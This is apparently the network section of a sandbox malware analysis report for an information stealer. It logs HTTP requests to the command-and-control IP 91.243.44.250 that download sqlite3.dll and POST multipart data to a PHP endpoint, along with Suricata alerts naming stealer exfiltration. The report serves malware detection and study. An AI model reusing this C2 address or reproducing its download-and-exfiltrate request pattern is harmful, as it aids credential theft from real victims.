Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
- UDP Requests
-
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62327 239.255.255.250:1900
-
192.168.56.101:62329 239.255.255.250:3702
-
192.168.56.101:62331 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://91.243.44.250/public/sqlite3.dll
REQUEST
RESPONSE
BODY
GET /public/sqlite3.dll HTTP/1.1
Host: 91.243.44.250
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 30 Aug 2021 01:01:06 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Mon, 09 Aug 2021 17:39:54 GMT
ETag: "9d9d8-5c923df863908"
Accept-Ranges: bytes
Content-Length: 645592
Content-Type: application/x-msdos-program
GET
200
http://91.243.44.250/kVpR1jIWa.php
REQUEST
RESPONSE
BODY
GET /kVpR1jIWa.php HTTP/1.1
Host: 91.243.44.250
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 30 Aug 2021 01:01:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: PHPSESSID=9mqi5h55gr901lb8lp9rkmbqd7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 36
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST
200
http://91.243.44.250/kVpR1jIWa.php
REQUEST
RESPONSE
BODY
POST /kVpR1jIWa.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BS0HDTR1VKF37YUA
Host: 91.243.44.250
Content-Length: 12056
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=9mqi5h55gr901lb8lp9rkmbqd7
HTTP/1.1 200 OK
Date: Mon, 30 Aug 2021 01:01:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49197 -> 91.243.44.250:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
TCP 91.243.44.250:80 -> 192.168.56.101:49197 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 91.243.44.250:80 -> 192.168.56.101:49197 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 192.168.56.101:49204 -> 91.243.44.250:80 | 2033163 | ET MALWARE Win32/Unk.Lebov Stealer CnC Exfil | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts